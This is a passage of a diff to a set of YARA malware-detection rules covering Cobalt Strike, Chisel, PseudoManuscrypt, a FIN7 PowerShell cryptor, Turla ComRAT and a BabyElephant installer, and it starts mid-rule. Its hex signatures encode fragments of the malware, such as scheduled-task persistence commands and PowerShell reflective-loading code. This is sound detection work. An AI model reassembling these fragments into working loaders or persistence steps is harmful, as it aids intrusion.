20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* ) and 1 of ( $seq* )
+		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect Cobalt Strike agent used by Chimera"
+		description = "Detect PseudoManuscrypt loader dropped by the installer"
 		author = "Arkbird_SOLG"
-		id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2"
-		date = "2020-10-03"
-		modified = "2020-10-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23"
+		id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed"
+		date = "2021-12-16"
+		modified = "2021-12-17"
+		reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f"
+		logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab"
+		hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f"
+		hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e"
+		hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c"
+		hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 }
-		$s1 = "\\\\%s\\pipe\\%s" fullword ascii
-		$s2 = "%04x-%04x:%s" fullword wide
-		$core1 = "core_pivot_session_new" fullword ascii
-		$core2 = "core_pivot_session_died" fullword ascii
-		$core3 = "core_pivot_remove" fullword ascii
-		$core4 = "core_pivot_add" fullword ascii
-		$lib1 = "CreateNamedPipeA" fullword ascii
-		$lib2 = "ConnectNamedPipe" fullword ascii
-		$lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii
-		$export = "ReflectiveLoader" fullword ascii
+		$s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 }
+		$s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c }
+		$s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 }
+		$s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e }
+		$s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 }
 
 	condition:
-		uint16( 0 ) == 0x4a5d and filesize > 30KB and $header and 1 of ( $s* ) and 2 of ( $core* ) and 2 of ( $lib* ) and $export
+		uint16( 0 ) == 0x5A4D and filesize > 3KB and filesize < 30KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Installer from BabyElephant APT"
+		description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak"
 		author = "Arkbird_SOLG"
-		id = "c89a127d-af49-597e-927d-c9a10c90fabe"
-		date = "2021-02-23"
-		modified = "2021-02-23"
-		reference = "https://twitter.com/h2jazi/status/1363683531067715584"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21"
+		id = "26361500-c33e-59c8-a53f-a881966c71a7"
+		date = "2021-06-07"
+		modified = "2021-06-07"
+		reference = "https://twitter.com/z0ul_/status/1401795117678219267"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28"
 		license_url = "N/A"
-		logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9"
-		score = 50
-		quality = 73
+		logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c"
+		score = 75
+		quality = 55
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e"
+		hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43"
+		hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b"
+		hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d"
+		hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7"
+		hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206"
+		tlp = "White"
+		adversary = "FIN7"
 
 	strings:
-		$s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c }
-		$s2 = "COMSPEC" fullword ascii
-		$s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 }
-		$s4 = "%s//%s" fullword ascii
-		$s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 }
-		$s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec }
-		$s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 }
+		$s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 }
+		$s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 }
+		$s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c }
+		$s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 }
+		$s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 }
+		$s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 }
+		$s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c }
+		$s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 }
+		$s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 }
+		$s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 }
+		$s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of them
+		filesize > 40KB and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE
 {
 	meta:
-		description = "Rule for detecting Chisel kit tool used by Hafnium"
+		description = "Detect ComRAT V4 (Chinch) used by APT Turla group"
 		author = "Arkbird_SOLG"
-		id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6"
-		date = "2021-02-23"
-		modified = "2021-04-25"
+		id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd"
+		date = "2021-01-23"
+		modified = "2021-01-26"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28"
 		license_url = "N/A"
-		hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04"
-		logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de"
+		logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		adversary = "Hafnium"
-		tlp = "white"
+		hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56"
 
 	strings:
-		$str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e }
-		$str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 }
-		$str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 }
-		$str4 = { 28 65 72 72 6f 72 20 25 73 29 }
-		$str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 }
-		$str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 }
-		$str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73}
-		$str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 }
-		$str9 = { 70 72 6f 78 79 23 25 73 }
-		$seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 }
-		$seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 